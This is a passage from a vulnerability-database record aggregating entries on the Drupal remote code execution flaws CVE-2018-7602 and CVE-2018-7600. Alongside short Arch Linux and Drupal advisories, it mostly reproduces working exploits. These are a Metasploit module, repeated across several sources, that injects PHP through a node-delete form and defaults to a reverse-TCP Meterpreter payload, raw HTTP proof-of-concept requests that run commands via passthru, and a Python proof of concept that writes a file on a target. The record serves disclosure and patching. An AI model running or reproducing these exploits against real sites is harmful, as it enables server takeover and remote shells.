\n'Targets' => \n[ \n['User register form with exec', {}], \n], \n'DisclosureDate' => 'Apr 29 2018', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']), \nOptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']), \nOptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']), \n]) \n \nregister_advanced_options( \n[ \n \n]) \nend \n \ndef uri_path \nnormalize_uri(target_uri.path) \nend \n \ndef start_exploit \ndrupal_node = datastore['DRUPAL_NODE'] \nres = send_request_cgi({ \n'cookie' => datastore['DRUPAL_SESSION'], \n'method' => 'GET', \n'uri' => \"#{uri_path}/node/#{drupal_node}/delete\" \n}) \nform_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first \nprint \"[*] Token Form -> #{form_token}\\n\" \nr2 = send_request_cgi({ \n'method' => 'POST', \n'cookie' => datastore['DRUPAL_SESSION'], \n'uri' => \"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\", \n'vars_post' => { \n'form_id' => 'node_delete_confirm', \n'_triggering_element_name' => 'form_id', \n'form_token'=> \"#{form_token}\" \n} \n}) \nform_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first \nprint \"[*] Token Form_build_id -> #{form_build_id}\\n\" \nr3 = send_request_cgi({ \n'method' => 'POST', \n'cookie' => datastore['DRUPAL_SESSION'], \n'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\", \n'vars_post' => { \n'form_build_id' => \"#{form_build_id}\" \n} \n}) \nend \n \ndef exploit \ncase datastore['TARGET'] \nwhen 0 \nstart_exploit \nelse \nfail_with(Failure::BadConfig, \"Your target is invalid.\") \nend \nend \nend \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147407/drupalgeddon3-exec.rb.txt"}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7602"], "description": "Arch Linux Security Advisory ASA-201804-10\n==========================================\n\nSeverity: Critical\nDate : 2018-04-27\nCVE-ID : CVE-2018-7602\nPackage : drupal\nType : arbitrary command execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-679\n\nSummary\n=======\n\nThe package drupal before version 8.5.3-1 is vulnerable to arbitrary\ncommand execution.\n\nResolution\n==========\n\nUpgrade to 8.5.3-1.\n\n# pacman -Syu \"drupal>=8.5.3-1\"\n\nThe problem has been fixed upstream in version 8.5.3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA remote code execution vulnerability exists within multiple subsystems\nof Drupal 7.x and 8.x. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\nImpact\n======\n\nA remote attacker is able to execute arbitrary code by performing a\nspecially crafted request.\n\nReferences\n==========\n\nhttps://www.drupal.org/sa-core-2018-004\nhttps://github.com/drupal/drupal/commit/bb6d396609600d1169da29456ba3db59abae4b7e\nhttps://security.archlinux.org/CVE-2018-7602", "modified": "2018-04-27T00:00:00", "published": "2018-04-27T00:00:00", "id": "ASA-201804-10", "href": "https://security.archlinux.org/ASA-201804-10", "type": "archlinux", "title": "[ASA-201804-10] drupal: arbitrary command execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-26T23:27:05", "edition": 1, "description": "Exploit for php platform in category web applications", "published": "2018-04-26T00:00:00", "title": "Drupal < 7.58 - drupalgeddon3 Authenticated Remote Code Execution (PoC) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "href": "https://0day.today/exploit/description/30262", "id": "1337DAY-ID-30262", "sourceData": "This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\r\n \r\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\r\n \r\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\r\n[...]\r\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\r\n \r\nRetrieve the form_build_id from the response, and then triggering the exploit with : \r\n \r\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\r\n[...]\r\nform_build_id=[FORM_BUILD_ID]\r\n \r\nThis will display the result of the whoami command.\r\n \r\nPatch your systems!\r\nBlaklis\n\n# 0day.today [2018-04-26] #", "sourceHref": "https://0day.today/exploit/30262", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-05-07T04:41:03", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-05-01T00:00:00", "title": "Drupal < 7.58 - Drupalgeddon3 Authenticated Remote Code Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "modified": "2018-05-01T00:00:00", "id": "1337DAY-ID-30275", "href": "https://0day.today/exploit/description/30275", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon3',\r\n 'Description' => %q{\r\n CVE-2018-7602 / SA-CORE-2018-004\r\n A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.\r\n This potentially allows attackers to exploit multiple attack vectors on a Drupal site\r\n Which could result in the site being compromised.\r\n This vulnerability is related to Drupal core - Highly critical - Remote Code Execution\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'SixP4ck3r', # Research and port to MSF\r\n 'Blaklis' # Initial PoC\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-004'],\r\n ['CVE', '2018-7602'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 29 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n OptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']),\r\n OptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def start_exploit\r\n drupal_node = datastore['DRUPAL_NODE']\r\n res = send_request_cgi({\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'method' => 'GET',\r\n 'uri' => \"#{uri_path}/node/#{drupal_node}/delete\"\r\n })\r\n form_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form -> #{form_token}\\n\"\r\n r2 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\",\r\n 'vars_post' => {\r\n 'form_id' => 'node_delete_confirm',\r\n '_triggering_element_name' => 'form_id',\r\n 'form_token'=> \"#{form_token}\"\r\n }\r\n })\r\n form_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form_build_id -> #{form_build_id}\\n\"\r\n r3 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\",\r\n 'vars_post' => {\r\n 'form_build_id' => \"#{form_build_id}\"\r\n }\r\n })\r\n end\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n start_exploit\r\n else\r\n fail_with(Failure::BadConfig, \"Your target is invalid.\")\r\n end\r\n end\r\n end\n\n# 0day.today [2018-05-07] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30275"}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "description": "Remote command execution vulnerability in Drupal\n\nVulnerability Type: Remote Command Execution", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "E-637", "href": "", "type": "dsquare", "title": "Drupal 7 SA-CORE-2018-004 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code Execution (PoC)", "edition": 1, "published": "2018-04-25T00:00:00", "title": "Drupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T00:00:00", "id": "EXPLOITPACK:08FA21237E28AF0AAD1F202F20D414F2", "href": "", "sourceData": "This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\n\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\n\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\n[...]\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\n\nRetrieve the form_build_id from the response, and then triggering the exploit with : \n\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\n[...]\nform_build_id=[FORM_BUILD_ID]\n\nThis will display the result of the whoami command.\n\nPatch your systems!\nBlaklis", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code (Metasploit)", "edition": 1, "published": "2018-04-30T00:00:00", "title": "Drupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-30T00:00:00", "id": "EXPLOITPACK:42663502F37846690238B2F6EAF79B4A", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n \n include Msf::Exploit::Remote::HttpClient\n \n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Drupalgeddon3',\n 'Description' => %q{\n CVE-2018-7602 / SA-CORE-2018-004\n A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.\n This potentially allows attackers to exploit multiple attack vectors on a Drupal site\n Which could result in the site being compromised.\n This vulnerability is related to Drupal core - Highly critical - Remote Code Execution\n\n The module can load msf PHP arch payloads, using the php/base64 encoder.\n\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'SixP4ck3r', # Research and port to MSF\n 'Blaklis' # Initial PoC\n ],\n 'References' =>\n [\n ['SA-CORE', '2018-004'],\n ['CVE', '2018-7602'],\n ],\n 'DefaultOptions' =>\n {\n 'encoder' => 'php/base64',\n 'payload' => 'php/meterpreter/reverse_tcp',\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => [ARCH_PHP],\n 'Targets' =>\n [\n ['User register form with exec', {}],\n ],\n 'DisclosureDate' => 'Apr 29 2018',\n 'DefaultTarget' => 0\n ))\n \n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\n OptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']),\n OptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']),\n ])\n \n register_advanced_options(\n [\n\n ])\n end\n \n def uri_path\n normalize_uri(target_uri.path)\n end\n\n def start_exploit\n drupal_node = datastore['DRUPAL_NODE']\n res = send_request_cgi({\n 'cookie' => datastore['DRUPAL_SESSION'],\n 'method' => 'GET',\n 'uri' => \"#{uri_path}/node/#{drupal_node}/delete\"\n })\n form_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first\n print \"[*] Token Form -> #{form_token}\\n\"\n r2 = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => datastore['DRUPAL_SESSION'],\n 'uri' => \"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\",\n 'vars_post' => {\n 'form_id' => 'node_delete_confirm',\n '_triggering_element_name' => 'form_id',\n 'form_token'=> \"#{form_token}\"\n }\n })\n form_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first\n print \"[*] Token Form_build_id -> #{form_build_id}\\n\"\n r3 = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => datastore['DRUPAL_SESSION'],\n 'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\",\n 'vars_post' => {\n 'form_build_id' => \"#{form_build_id}\"\n }\n })\n end\n \n def exploit\n case datastore['TARGET']\n when 0\n start_exploit\n else\n fail_with(Failure::BadConfig, \"Your target is invalid.\")\n end\n end\n end", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "edition": 1, "published": "2018-04-13T00:00:00", "title": "Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "href": "", "sourceData": "#!/usr/bin/env\nimport sys\nimport requests\n\nprint ('################################################################')\nprint ('# Proof-Of-Concept for CVE-2018-7600')\nprint ('# by Vitalii Rudnykh')\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\nprint ('# https://github.com/a2u/CVE-2018-7600')\nprint ('################################################################')\nprint ('Provided only for educational or information purposes\\n')\n\ntarget = input('Enter target url (example: https://domain.ltd/): ')\n\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\n# set verify = False if your proxy certificate is self signed\n# remember to set proxies both for http and https\n# \n# example:\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n# verify = False\nproxies = {}\nverify = True\n\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\n\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\ncheck = requests.get(target + 'hello.txt')\nif check.status_code != 200:\n sys.exit(\"Not exploitable\")\nprint ('\\nCheck: '+target+'hello.txt')", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "drupal": [{"lastseen": "2020-12-25T21:41:43", "bulletinFamily": "software", "cvelist": ["CVE-2018-7602"], "description": "Project: \n\nDrupal core\n\nDate: \n\n2018-April-25\n\nSecurity risk: \n\n**Highly critical** 20\u221525 AC:Basic/A:User/CI:All/II:All/E:Exploit/TD:Default\n\nVulnerability: \n\nRemote Code Execution\n\nCVE IDs: \n\nCVE-2018-7602\n\nDescription: \n\nA remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.\n\n_Updated \u2014 this vulnerability is being exploited in the wild._\n\nSolution: \n\nUpgrade to the most recent version of Drupal 7 or 8 core.\n\n * If you are running 7.x, upgrade to [Drupal 7.59](<https://www.drupal.org/project/drupal/releases/7.59>).\n * If you are running 8.5.x, upgrade to [Drupal 8.5.3](<https://www.drupal.org/project/drupal/releases/8.5.3>).\n * If you are running 8.4.x, upgrade to [Drupal 8.4.8](<https://www.drupal.org/project/drupal/releases/8.4.8>). (Drupal 8.4.x is no longer supported and we don't normally provide security releases for [unsupported minor releases](<https://www.drupal.org/core/release-cycle-overview>). However, we are providing this 8.4.x release so that sites can update as quickly as possible. You should update to 8.4.8 immediately, then update to 8.5.3 or the latest secure release as soon as possible.) \n\nIf you are unable to update immediately, or if you are running a Drupal distribution that does not yet include this security release, you can attempt to apply the patch below to fix the vulnerability until you are able to update completely:\n\n * [Patch for Drupal 8.x](<https://git.drupalcode.org/project/drupal/commit/bb6d396609600d1169da29456ba3db59abae4b7e.diff>) (8.5.x and below)\n * [Patch for Drupal 7.x](<https://git.drupalcode.org/project/drupal/commit/080daa38f265ea28444c540832509a48861587d0.diff>)\n\nThese patches will only work if your site already has the fix from [SA-CORE-2018-002](<https://www.drupal.org/sa-core-2018-002>) applied. (If your site does not have that fix, [it may already be compromised](<https://www.drupal.org/psa-2018-002>).)\n\nReported By: \n\n * [David Rothstein ](<https://www.drupal.org/user/124982>) of the Drupal Security Team\n * [Alex Pott ](<https://www.drupal.org/user/157725>) of the Drupal Security Team\n * [Heine Deelstra ](<https://www.drupal.org/user/17943>) of the Drupal Security Team\n * [Jasper Mattsson ](<https://www.drupal.org/user/521118>)\n\nFixed By: \n\n * [David Rothstein ](<https://www.drupal.org/user/124982>) of the Drupal Security Team\n * [xjm](<https://www.drupal.org/user/65776>) of the Drupal Security Team\n * [Samuel Mortenson ](<https://www.drupal.org/user/2582268>) of the Drupal Security Team\n * [Alex Pott ](<https://www.drupal.org/user/157725>) of the Drupal Security Team\n * [Lee Rowlands ](<https://www.drupal.org/user/395439>) of the Drupal Security Team\n * [Heine Deelstra ](<https://www.drupal.org/user/17943>) of the Drupal Security Team\n * [Pere Orga ](<https://www.drupal.org/user/2301194>) of the Drupal Security Team\n * [Peter Wolanin ](<https://www.drupal.org/user/49851>) of the Drupal Security Team\n * [Tim Plunkett ](<https://www.drupal.org/user/241634>)\n * [Michael Hess ](<https://www.drupal.org/user/102818>) of the Drupal Security Team\n * [Nate Lampton ](<https://www.drupal.org/user/35821>)\n * [Jasper Mattsson ](<https://www.drupal.org/user/521118>)\n * [Neil Drumm ](<https://www.drupal.org/user/3064>) of the Drupal Security Team\n * [Cash Williams ](<https://www.drupal.org/user/421070>) of the Drupal Security Team\n * [Daniel Wehner ](<https://www.drupal.org/user/99340>)\n", "modified": "2018-04-25T00:00:00", "published": "2018-04-25T00:00:00", "id": "DRUPAL-SA-CORE-2018-004", "href": "https://www.drupal.org/sa-core-2018-004", "type": "drupal", "title": "Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
